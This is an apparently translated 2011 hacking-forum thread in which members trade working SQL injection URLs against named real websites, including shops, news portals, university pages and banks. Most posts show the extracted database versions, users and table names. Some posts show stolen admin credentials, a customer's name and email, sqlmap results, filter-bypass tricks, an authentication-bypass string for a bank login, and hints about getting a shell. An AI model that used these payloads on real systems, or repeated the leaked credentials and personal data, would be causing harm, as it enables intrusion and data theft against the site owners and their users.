http://www.gameplanpros.com/v.php?id=8+union+select+1,2,3,4,5,6,7,8,9,concat_w s%280x3a,version%28%29,database%28%29,user%28%29%2 9,11,12,13--+
5.1.58-community-log:gamepla5_gameplan:gamepla5_gpweb@localhost
Code:
http://www.avk-bearing.ru/n.php?id=8+union+select+1,2,3,concat_ws%280x3a,ver sion%28%29,database%28%29,user%28%29%29,5--+
5.1.41-log:nowhere_db:nowhere_mysql@10.1.82.94
Code:
http://www.mukeshmarwah.net/b.php?id=8+union+select+1,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,3,4,5,6,7
5.0.92-log:mm-1967694:mukesh@172.16.0.220.
Code:
http://www.sirohibazar.com/b.php?id=-8+union+select+1,2,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29,4,5,6
5.0.22-community-nt:news:news@localhost
Code:
http://bergtouren.hohmann-edv.de/bergwanderungen/b.php?ID=-8+union+select+1,2,3,concat_ws%280x3a,version%28%2 9,database%28%29,user%28%29%29,5,6,7--+
5.1.47-log:ilo01247-bergtouren:ilo01247@localhos
stepashka_
11.11.2011, 13:48
http://board.bizua.com.ua/index.php?id_typ=276+union+select+1,2,3,4,5,6,CONC AT_WS(0x3a,user(),version(),DATABASE()),8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+--+
FIDEPP_SE1@LOCALHOST:5.2.4-MARIADB:FIDEPP_SE1
Albseera
11.11.2011, 18:55
Help me figure out this monster, I just can't get the tables:
http://ch eck-e ngine.ru/support.php?idt=-1+UNION+SELECT+1,version(),3,4--
4.0.27-log
Is there really no way here other than brute force?
loongson.cn
www.loongson.cn
[PR = 5]
[TIC = 10]
Code:
http://www.loongson.cn/solutions_two.php?id=45+AND+1=2+UNION+SELECT+1,2,3 ,4,5,CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE( ))+--+
or
http://www.loongson.cn/product_info.php?id=31+AND+1=2+UNION+SELECT+1,2,3, 4,5,CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE() )+--+
hongjun@localhost-5.0.51a-24+lenny2-loongson_www_cn
Of interest: the administrator has a strong password =]
By the way, do you know what Loongson is? Link: ru.wikipedia.org/wiki/Loongson (http://ru.wikipedia.org/wiki/Loongson)
www.heroworld.net
[PR=4]
[TIC=10]
Code:
http://www.heroworld.net/news.php?id=957+AND+1=2+UNION+SELECT+1,2,3,4,CONCA T_WS(CHAR(45),USER(),VERSION(),DATABASE()),6,7,8,9 ,10+--+
ghevilp@localhost-5.1.53-heroworld_top
aydin-ka
12.11.2011, 16:41
TIC 325 PR 5
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+unio n+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws%2 80x3a,user%28%29,database%28%29,version%28%29%29,1 5,16+--+
test77@localhost:test77_cl_spbnews_ru:5.0.67
Tables
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+unio n+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_conca t%28table_name%29,15,16+FROM+INFORMATION_SCHEMA.TA BLES--
PHP:
albums_de,albums_en,albums_es,albums_fr,albums_ru, ban_de,ban_en,ban_es,ban_fr,ban_ru,bantyp,carousel _de,carousel_en,carousel_es,carousel_fr,carousel_r u,catalog_de,catalog_en,catalog_es,catalog_fr,cata log_ru,catitem_de,catitem_en,catitem_es,catitem_fr ,catitem_ru,cns_advert_pages,cns_advert_referers,c ns_cache_advert_cost,cns_cache_destinations,cns_ca che_referers,cns_cache_robots,cns_cache_servers,cn s_config,cns_counter,cns_counter_total,cns_data,cn s_filteritems,cns_filterlist,cns_filterrelation,cn s_goodies,cns_googlecache,cns_ipalias,cns_language s,cns_log,cns_openstat,cns_restorepassword,cns_rss _cache,cns_rss_rebuild,cns_size,cns_slide_cache,cn s_slides,cns_subnets,cns_today,cns_users,cns_users _access,cns_users_sessions,cns_who_cache,contact_d e,contact_en,contact_es,contact_fr
Code:
http://www.ladogaspb.ru/ru/s/4/promyshlennaya_gruppa_ladoga.html?msid=999999+unio n+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_conca t%28id_user,0x3a,report%29,15,16+from+cns_users_ac cess--
php info - http://www.ladogaspb.ru/phpinfo.php
SQLinj In SQLinj
Code:
http://erfen.ru/antispam/region.php?num=9631234567+and+1=2+union+select+1,2 +--+
A nested query!
Code:
http://erfen.ru/antispam/region.php?num=9631234567 and 1=2 union select '2 and 1=3 union select concat_ws(0x3b,version(),user(),database()) -- ',0 --+
www.maginfo.com.ua/cat.php?id=-1+union+select+table_name+from+information_schema. tables--
Boolean, tell me, what is a nested query used for?
shadowrun
13.11.2011, 19:17
Code:
http://www.captainsofcrush.ru/grippers/info.php?id=-18+union+select+1,photo2,3,4,5,6,7,8+FROM+catalog+--+
TIC - 30
PR - 3
Code:
http://www.povituha.ru/news.php?id=9999999+union+select+1,2,database,4,5, 6+--+
TIC - 50
PR - 3
Code:
http://dizelbox.net/news.php?id=-1+union+select+1,database%28%29,3,4,5+--+
TIC - 0
PR - 3
admin panel
Code:
http://dizelbox.net/adm/indexx.php
admin:zx89pe531yz
Code:
marketing.rbc.ua/file.php?id=-1+union+select+CONCAT_WS(0x3a,user(),version(),DAT ABASE()),2,3+--+
research@localhost:5.0.91:rbc_research_new
TIC - 140
PR - 5
Code:
http://www.feldgrau.com/articles.php?ID=-32+union+select+1,2,3,4,5,concat_ws%280x3a,version %28%29,database%28%29,user%28%29%29,7,8--+
5.0.51a-3ubuntu5.8:feldgrau:feldgrau@localhost
Code:
http://www.choices.edu/resources/detail.php?id=-32+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,ver sion%28%29,database%28%29,user%28%29%29,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30--+
4.1.22-log:Choices:choices@skylark.services.brown.edu
shadowrun
14.11.2011, 11:22
Code:
http://keystone.com.ua/print_ground.php?id=-2451+union+select+concat_ws%280x3a,version%28%29,d atabase%28%29,user%28%29%29,2,3,4,5,6,7,8,9,10,11, 12,13,14+--+
PR -4
TIC - 60
Code:
http://autoline24.com.ua/russian/search.php?id=1%27+union+select+1,2,3+--+
Somehow it won't go any further
aydin-ka
14.11.2011, 18:40
TIC 210 Traffic 2K
Code:
http://2010001.ru/news/index.php?rzd=99999999/**/UnIoN/**/SeLeCt/**/1,2,concat_ws%280x3a,user%28%29,database%28%29,ver sion%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19--
h2zhilf_ramm@localhost:h2zhilf_news:5.0.77
Tables
Code:
http://2010001.ru/news/index.php ?rzd=99999999/**/UnIoN/**/SeLeCt/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLE S--
PHP:
users,basa,basa_comm,basa_comm_biz,basa_comm_hot,b asa_comm_hot_top,basa_comm_pur,basa_comm_region
Output from the columns
Code:
http://2010001.ru/news/index.php ?rzd=99999999/**/UnIoN/**/SeLeCt/**/1,2,concat_ws(user_id,0x3a,login),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19+FROM+users--
http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+CONCAT%28concat_ws%280x3a,email,nam e,description%29%29,2,3,4,5,6,7,8,9+from+news_auto rs%20%20limit%200,1--
Look carefully on the left
Admin panel (http://presscenter.kz/modules/psw.php)
Coffee Board of India - www.indiacoffee.org
[PR=5]
[TIC=10]
Code:
http://indiacoffee.org/indiacoffee.php?page=MarketInfo%27+AND+1=2+UNION+S ELECT+CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE ())+--+
indiacof@67.15.184.41-5.0.84-percona-highperf-b18-log-indiacoffee
Interesting tables: tb_admin_user, tb_user_details, user_data
Administrators: Dr.Babu Reddy, Mr.Bharath Kumar, Mr.Mohandas
...and overall, a tasty coffee company...
city information portal
http://krasnoturinsk.org/cgi-bin/news/index.pl?id=-381+union+all+select+1,concat_ws(char(58),@@versio n,user(),database()),3,4,5,6,7,8,9,10,11--#.TsICu4SHHsz
4.1.22 reporter@host245.fnet2.ae21vek.ru TEST
HellFire
15.11.2011, 11:54
Code:
http://isaxon.com/ru/album.php?id=1-999999999.9+UNION+SELECT+1,2,3,4,5,6,7,8,AES_DECRY PT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,V ersion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0 x7873716C696E6A656E64),0x71),0x71),10--
Database Version: 5.5.17-log
Database name: cxm
User name: cxm@localhost
Some junk site with song lyrics...
Code:
http://knifetricks.ru/market/more.php?id=1-0.1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,0x71),0x71),3,4,5,6,7,8,9,10,11--
Database Version: 5.0.77-log
Database name: rosforex_1
User name: rosforex_1@localhost
A slapped-together Russian knife shop...
My site
TIC 700 traffic ~4500 K per day
Output in the title
http://www.
oxothik.ru
/index.php?action=articles&id=-114+union+select+version%28%29
If anyone knows how to get further, please PM me.
tabletkO
16.11.2011, 14:32
OxoTnik,
Code:
http://www.oxothik.ru/index.php?action=articles&id=-114+union+%0A+select+table_name+from+information_s chema.tables+--+
Code:
http://www.oxothik.ru/index.php?action=articles&id=-114+union+%0A+select+login+from+tour_users+limit+0 ,1+--+
Code:
http://www.oxothik.ru/index.php?action=articles&id=-114+union+%0A+select+password+from+tour_users+limi t+0,1+--+
What's so hard about it?)
P.S. %0A = Enter...
TIC 700 traffic ~4500 K per day
Friend, "k" means three zeros, i.e. 1k = 1000, 2.5k = 2500 and so on. And here 4500K is already 4.5 million
-------------------------------
On topic:
TIC 10
Code:
http://www.topreferat.com/josparesep.php?id=7+union+%0A+select+1,table_name, 3,4+from+information_schema.tables+--+
Code:
http://www.egolife.kz/catalog/showproduct/id/18+union+select+concat_ws%28user%28%29,version%28% 29,database%28%29%29,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,12,43,44,45,46,47 ,48
http://www.hazart.ru/index.php?id=-43+union+select+1,2,3,4,5,concat_ws%280x3a,user_id ,user_login,user_pass%29+from+admin_users--
Boring site, a waste of time; couldn't crack the passwords in 3 days of full brute force over 12 characters
http://www.kubanjob.ru/vacanc.php?id=-1+union+select+1,2,3,4,5,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,7,8,9,10,11,12, 13,14,15,16,17,18,19,20
MySQL 4
shadowrun
17.11.2011, 23:38
Code:
http://zenit.nevasport.ru/text.php?id=-13%27+union+select+1,group_concat%280x3a,table_nam e%29,3,concat_ws%280x3a,database%28%29,user%28%29, version%28%29%29,5+from+information_schema.tables+--+
PR - 4
TIC - 50
aydin-ka
18.11.2011, 00:09
PR 4
Code:
http://rent4day.am/info.php?lang=3&id=999999999+union+select+1,2,3,4,5,6,concat_ws%28 0x3a,user%28%29,database%28%29,version%28%29%29,8, 9,10,11,12,13,14,15,16,17,18,19,20--
rent4day_rent@localhost:rent4day_rent4day:5.0.92-community-log
Tables
Code:
http://www.rent4day.am/info.php?lang=3&id=999999999+union+select+1,2,3,4,5,6,GrOuP_CoNcat %28table_name%29,8,9,10,11,12,13,14,15,16,17,18,19 ,20+FROM%20INFORMATION_SCHEMA.TABLES%20--
stepashka_
18.11.2011, 11:44
http://www.elektra-77.kh.ua/doska6/ind.php?pn=776&id_typ=17+union+select+1,2,3,4,5,6,version(),8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3+--+
4.1.25-log
Code:
http://www.desktopmachine.com/framepic.php?id=2390+union+select+1,2,3,4,5,6,7,8, 9,10,11,cast%28concat_ws%280x3a,user%28%29,version %28%29,database%28%29%29%20as%20binary%29,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29--&size=1024
desktop@localhost:4.1.14:desktop
Google PR: 4
stan0009
18.11.2011, 20:00
sorry for the offtopic)
making up for it:
http://www.surfcitygarage.com/detail1.php?product_id=351
Traffic = 4K
Database Version : MySQL 4.1
Current database : desktop
http://stalkerfest.org/page.php?page=42&iD=-1+union+select+1,2,version%28%29,4,5,6,7,8,9
4 characters
kallstrom
19.11.2011, 00:32
http://estpovod.ru/games.php?target=section&id=6
PR 4
TIC 190
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: target=section&id=6 AND SLEEP(5)
Data Base Found: information_schema
Data Base Found: Sql286973_1
Data Base Found: Sql286973_2
Data Base Found: Sql286973_3
Data Base Found: Sql286973_4
Data Base Found: Sql286973_5
aydin-ka
19.11.2011, 00:43
kallstrom said:
PR
4
TIC
190
Got it working
Code:
http://estpovod.ru/games.php?target=section&id=9999999+union+select+concat_ws%280x3a,user%28%2 9,database%28%29,version%28%29%29--
Code:
http://estpovod.ru/games.php?target=section&id=9999999+union+select+group_concat%28table_name% 29+from+information_schema.tables--
kallstrom
19.11.2011, 01:16
http://www.vaal.ru/show.php?id=91
PR 4
TIC 150
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=91 AND 9682=9682
available databases [1]:
vaal119
kallstrom
19.11.2011, 02:20
http://www.fckamaz.ru/pages/news.php?id=1130
PR 4
TIC 600
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1130' AND (SELECT 4682 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,1
07,107,58),(SELECT (CASE WHEN (4682=4682) THEN 1 ELSE 0 END)),CHAR(58,111,100,10
7,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'HYxg'
='HYxg
available databases [3]:
fckamazru
fckamazru_wordpress
information_schema
shadowrun
19.11.2011, 22:45
Code:
http://libinfo.org/index.php?id=-8787+union+select+1,2,3,4,5,concat_ws%280x0b,name, 0x3a,pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21+from+users+--+
TIC - 30
PR - 4
Code:
http://www.toramp.com/tnews.php?id=-16%27+union+select+1,2,3,group_concat%280x0b,usern ame,0x3a,passhash%29,5,6,7,8,9,10,11+from+users+--+
kallstrom
20.11.2011, 16:22
http://math.ucsd.edu/people/profile.php?id=2020
TIC - 110
PR - 6
Place: GET
Parameter: id
Type: AND/OR time-based blind
Title: MySQL
stepashka_
20.11.2011, 18:10
http://www.495-irr.ru/ind.php?id_typ=-138+/*!UNION*/+SELECT+1,2,3,4,5,6,/*!table_name*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33+from+information_schema .tables+--+
Didn't find the admin panel login(
kallstrom
20.11.2011, 23:48
http://www.drummajorinstitute.org/library/article.php?ID=5518%20AND%20(SELECT%208461%20FROM( SELECT%20COUNT(*),CONCAT(CHAR(58,121,111,121,58),( SELECT%20MID((IFNULL(CAST(schema_name%20AS%20CHAR) ,CHAR(32))),1,50)%20FROM%20information_schema.SCHE MATA%20LIMIT%201,1),CHAR(58,121,102,112,58),FLOOR( RAND(0)*2))x%20FROM%20information_schema.tables%20 GROUP%20BY%20x)a)
PR 6
TIC 10
kallstrom
21.11.2011, 00:03
http://www.zionpark.org/prod.php?id=30%20AND%20(SELECT%201710%20FROM(SELEC T%20COUNT(*),CONCAT(CHAR(58,98,115,99,58),(SELECT% 20MID((IFNULL(CAST(schema_name%20AS%20CHAR),CHAR(3 2))),1,50)%20FROM%20information_schema.SCHEMATA%20 LIMIT%201,1),CHAR(58,120,108,120,58),FLOOR(RAND(0) *2))x%20FROM%20information_schema.tables%20GROUP%2 0BY%20x)a)
PR 5
kallstrom
21.11.2011, 00:11
http://www.loginstitute.ca/moreinfo.php?id=1
PR 6
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1076=1076
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
available databases [1]:
logistics_db
kallstrom
21.11.2011, 00:22
http://www.raconline.org/funding/funding_details.php?funding_id=-3817%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL ,%20NULL,%20NULL,%20NULL,%20CONCAT(CHAR(58,109,109 ,106,58),IFNULL(CAST(schema_name%20AS%20CHAR),CHAR (32)),CHAR(58,104,121,111,58)),%20NULL,%20NULL,%20 NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NU LL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL ,%20NULL,%20NULL,%20NULL%20FROM%20information_sche ma.SCHEMATA%20LIMIT%202,1#
PR 7
TIC 10
mixfevers.com
Code:
http://www.mixfevers.com/page.php?PageType=-9999999'+UNION+SELECT+1,2,CONCAT_WS('-',USER(),VERSION(),DATABASE())+--+
admin@localhost-5.0.45-mix_pages
...a great many tables, some understandable and some not, and no use at all... there is something like a home-made billing system...
Code:
http://mixfevers.com/clientlogin.php
...in which one client "lives"... =]
ID=1 Trey Alexander delawaredogsupplies@yahoo.com
shadowrun
21.11.2011, 12:26
Code:
http://www.cryptocrat.com/show_node.php?id=-40%27+union+select+1,2,group_concat%28column_name% 29,4,5,6,7,8,9+from+information_schema.columns+whe re+table_name=0x7573657273+--+
Code:
http://pisateli.co.ua/page.php?id=-383%27+union+select+1,group_concat%28email,0x3a,pa ssword%29,3,4+from+kiev_forum_users+--+
Code:
http://shake.metroland.ru/drink/view_drink.php?id=-6%27+union+select+1,group_concat%28database%28%29, version%28%29,user%28%29%29,3,4,5,6,7+--+
kallstrom
21.11.2011, 13:40
http://www.nmlra.org/store.asp?CatID=-518%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,N ULL,(SELECT%20TOP%201%20CHAR(58)+CHAR(108)+CHAR(11 7)+CHAR(106)+CHAR(58)+ISNULL(CAST(name%20AS%20NVAR CHAR(4000)),CHAR(32))+CHAR(58)+CHAR(113)+CHAR(106) +CHAR(117)+CHAR(58)%20FROM%20master..sysdatabases% 20WHERE%20ISNULL(name,CHAR(32))%20NOT%20IN%20(SELE CT%20TOP%20136%20ISNULL(name,CHAR(32))%20FROM%20ma ster..sysdatabases%20ORDER%20BY%201)%20ORDER%20BY% 201)--
PR=5
TYC=10
Alexa=3,358,182
kallstrom
21.11.2011, 16:21
http://www.teach-nology.com/lessons/lsn_pln_view_lessons.php?action=view&cat_id=10 AND (SELECT 6010 FROM(SELECT COUNT(*),CONCAT(CHAR(58,107,113,116,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 3,1),CHAR(58,101,122,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=6
TYC=40
Alexa=46,282
TIC 1700
http://www.solvex.ru/agents/?uid=-1/**/union/**/select/**/1,2,3,4,concat_ws%280x3a,version%28%29,user%28%29, database%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17--
version():5.1.39
user():root@localhost
database():solvexmdb
file_priv:Y
Will come in handy for a shell
http://www.solvex.ru/info.php
kallstrom
21.11.2011, 18:37
A bit of adult content)
http://www.sex-leshiy.ru/sex_post.php?id=96' AND (SELECT 88 FROM(SELECT COUNT(*),CONCAT(CHAR(58,108,107,109,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 15,1),CHAR(58,118,108,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'skIN'='skIN
PR=3
Alexa=1,405,386
kallstrom
21.11.2011, 19:42
Worked it through:
http://roosterteeth.com/faq/?id=8 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,120,107,103,58),IFNULL(CAST(schema_ name AS CHAR),CHAR(32)),CHAR(58,114,109,119,58)), NULL FROM information_schema.SCHEMATA#
kallstrom
21.11.2011, 20:05
Something about vacations...
http://www.clubmed.ru/villages/village.php?id=12 AND (SELECT 9101 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,112,103,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,117,102,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=4
TIC=300
Alexa=2,705,110
ku6ep_xayS
21.11.2011, 20:46
a database gift in the form of an online shop=)
http://bookvica.com.ua/shop.php?id=-300+union+select+1,2,concat(login,char(58),pass),4 ,5,6,7,8,9,10,11,12,13+from+users--
kravch_v
21.11.2011, 23:46
Code:
http://www.playonline.com.ua/game.php?id=1313+and%28select+1+from%28select+coun t%28*%29%2Cconcat%28%28select+%28select+concat%280 x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+a s+char%29%29%29%2C0x27%2C0x7e%29%29+from+informati on_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280 %29*2%29%29x+from+information_schema.tables+group+ by+x%29a%29+and+1%3D1
PHP/5.2.14
Version: 5.0.51a-community
DB: dvdpoisk_pl
User: dvdpoisk_pl@localhost
Tables: categories,games,games2,rotation
kallstrom
22.11.2011, 00:46
Games)
Looks like Iranians had already owned this site before me))
http://gametrove.net/company.php?id=24 AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1,1),1,1)) > 103
PR=4
TIC=10
Alexa=764,873
Anyway, here is what I found
http://www.profshina.ru/index.php?page=9005001&tmpl=7&nbid=1&newsid=-1+%0A+union+%0A+select+concat_ws%280x3a,ID,NAME,DO L,ORG,MAIL%29+%0A+from+%0A+profsh_user+%0Alimit%20 0,1--
kallstrom
22.11.2011, 18:37
Genetics and society
http://www.geneticsandsociety.org/article.php?id=4519 AND (SELECT 512 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,118,106,58),(SELECT MID((IFNULL(CAST(schema_name AS CHAR),CHAR(32))),1,50) FROM information_schema.SCHEMATA LIMIT 1,1),CHAR(58,98,103,113,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
PR=5
TIC=20
kallstrom
22.11.2011, 19:03
Funny GIFs))
http://www.omfgif.com/gif.php?id=4961 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,106,122,99,58),IFNULL(CAST(schema_n ame AS CHAR),CHAR(32)),CHAR(58,97,119,114,58)), NULL, NULL FROM information_schema.SCHEMATA#
tabletkO
22.11.2011, 19:33
PostgreSQL
TIC 10
HTML:
http://www.24fishing.ru/fish/fish.php?id=-1+union+select+null,version(),null,null,null,null--
Result:
HTML:
PostgreSQL 8.3.9 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
P.S. My first PostgreSQL SQLi )
----
MySQL
PR 5
HTML:
http://www.killarney.ie/fish.php?id=-1+union+select+1,table_name,3,4,5,6,version(),user (),database(),10,11,12,13,14,15,16+from+informatio n_schema.tables--+
Everything gets output)
nemaniak
22.11.2011, 21:15
resi.at PR-5
Code:
http://www.resi.at/resi-nr/beitrag.php?id=-1393+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16,17 ,18,19,20,21,22,23+--+
Code:
5.1.41-3ubuntu12.10:c0resi@localhost:c0resi
*in the title
goonersguide.com PR-4 alexa-82k
Code:
www.goonersguide.com/read_news_item.php?newsID=-490+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11+--+
Code:
4.1.22-community-nt:pk@208.118.249.170:goonersguide
ergo-russ.com TIC-650
Code:
http://www.ergo-russ.com/press-news-detail.php?news_id=-49+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4+--+
Code:
4.0.27-log:zao_rus@195.242.3.251:zao_rus
kallstrom
23.11.2011, 01:34
A site about the German army, 1918-1945
http://www.feldgrau.com/PzDiv.php?ID=2 UNION ALL SELECT NULL, CONCAT(CHAR(58,111,105,122,58),IFNULL(CAST(schema_ name AS CHAR),CHAR(32)),CHAR(58,109,101,122,58)), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM information_schema.SCHEMATA#
PR=5
TIC=40
Alexa=904,998
---------------------
Something about motorcycle parts
https://www.kisantech.com/index.php?cat_id=-9792 OR NOT ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1,1),11,1)) > 97
It's blind here; showed it as best I could)
worstpreviews.com
[TIC=130]
[PR=5]
Code:
http://www.worstpreviews.com/headline.php?id=999999999+AND+1=2+UNION+SELECT+1,2 ,3,4,5,6,7,CONCAT_WS('-',USER(),VERSION(),DATABASE()),9,10,11+--+
alexgi_2@localhost-5.1.56-log-alexgi_worstreview
but I could not find the forum database [vBulletin™ Version 4.0.1]. I suspect it is not on localhost... a pity =]
kallstrom
23.11.2011, 21:34
An electrical equipment shop
http://www.vt4c.com/shop/program/main.php?group_id=2 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),CHAR(32))),1,1)) > 117
Boolean-based blind
PR=3
Alexa=10,414,839
Some devils from Moscow
http://www.mosoblproc.ru/news/?id=950+and+1=0+union+select+1,2,3,table_name,5,6+ from+information_schema.tables--+&print=1
stan0009
24.11.2011, 00:23
zenon3 said:
http://www.nfasp.org.uk/events_single.php?id=1110'
Help me figure this out. I don't understand at all what kind of filtering is there.
use blind
kacergei
24.11.2011, 00:35
stan0009 said:
use blind
besides that link, there is also blind here:
Target: http://www.nfasp.org.uk/resources_listing.php?typeid=2{blind}
Database: cmsdb
kallstrom
24.11.2011, 00:40
Welcome! Escort services all over the world!
http://rome.allworldescorts.com:80/profile.php?ad_id=504&category=VIP Escorts
Place: GET
Parameter: ad_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ad_id=504' AND 6865=6865 AND 'QfsV'='QfsV&category=VIP Escorts
[PR=3]
Code:
http://www.killfromtheheart.com/albums.php?id=2128+AND+1=2+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,CONCAT_WS(CHAR(45,45),USER(),V ERSION(),DATABASE()),15,16,17,18,19,20+--+
datapass@cgi0702.int.bizland.net--5.0.91-log--kfth_data
Code:
http://www.killfromtheheart.com/admin/
tabletkO
24.11.2011, 09:58
TIC 120
A bank... Continuing the thread /thread304582.html (https://antichat.live/threads/304582/)
HTML:
http://www.vitasbank.ru/list.php?id=-1)+union+select+version()--+1
lion-art
24.11.2011, 11:22
A bank?
tabletkO said:
TIC 120
A bank... Continuing the thread
/thread304582.html (https://antichat.live/threads/304582/)
HTML:
http://www.vitasbank.ru/list.php?id=-1)+union+select+version()--+1
well, since things have gone that way
https://client.uniastrum.ru/Login.aspx?ReturnUrl=%2fdefault.aspx
login: hi' or 1=1--
pass: hi' or 1=1--
"American Crisis"=/
Site:www.americancrisis.us
PR=4
Alexa=2 862 020
Inject
Code:
_ttp://www.americancrisis.us/Home.php?MI=9+and+1=2+union+select+null,null,null, database(),null,null,null,null,null,null
Version:4.1.20-max-log
Database:JanAFC_genweb
User:JanAFC_Pgm2@72.41.255.242
-----------------------------------------------------
-----------------------------------------------------
"African Crisis" =/
Site:www.picknclick.biz
PR=3
Alexa=8 991 159
Inject
Code:
_ttp://www.picknclick.biz/Home3.php?S=11+and+1=2+union+select+1,2,3,database (),5,6,7,8,9,10,11,121,31,4,15,16,17,18,19,20,21+--+
Version:4.1.20-max-log
Database:JanAFC_picknclick
User:JanAFC_Pgm1@72.41.255.242
-----------------------------------------------------
-----------------------------------------------------
"Historical Crisis" =/
Site:www.historyreviewed.com
PR=3
Alexa=15 242 051
Inject
Code:
_ttp://www.historyreviewed.com/Home.php?MI=243+and+1=2+union+select+1,2,3,version (),5,6,7,8,9,10
Version:5.0.91-log
Database:jangdgenweb
User:jangdgenweb@184.168.152.144
-----------------------------------------------------
-----------------------------------------------------
"Labor Crisis" =/
Site:www.drudgereportarchives.net
PR=3
Alexa=2 905 350
Inject
Code:
_ttp://www.drudgereportarchives.net/Home.php?MI=277+and+1=2+union+select+1,2,3,version (),null,6,7,8,9,10
Version:4.1.20-max-log
Database:JanAFC_genweb
User:JanAFC_Pgm3@72.41.255.242
-----------------------------------------------------
-----------------------------------------------------
"Market Crisis" =/
Site:www.stocktipster.net
PR=3
Inject
Code:
_ttp://www.stocktipster.net/Home.php?MI=124+and+1=2+union+select+1,2,3,version (),null,6,7,8,9,10
Version:4.1.20-max-log
Database:JanAFC_genweb
User:JanAFC_Pgm2@72.41.255.242
kacergei
24.11.2011, 17:18
http://www.artem.ua/news/index.php?id_art=99{sql}
DB Server: MySQL >=4.1
Current DB: webartem
I only found the news table; maybe someone can help work it through?
TIC 160
http://www.saltykov.net.ru/lib/ar/author/-1+union+select+1,2,schema_name,4,5,6+from+informat ion_schema.schemata%20limit%208,1
tabletkO
24.11.2011, 17:29
kacergei said:
http://www.artem.ua/news/index.php?id_art=99{sql}
DB Server: MySQL >=4.1
Current DB: webartem
I only found the news table; maybe someone can help work it through?
HTML:
http://www.artem.ua/news/index.php?id_art=-1+union+select+1,version(),3,4,5,6,7,8,9,10--+1
4.1.25-log
PR 6 TIC 3500
TIC 3500
DB User: 'mba'@'localhost'
Host Name: nn1.r52.ru
Sql Version: 5.0.51a
http://
r52.ru
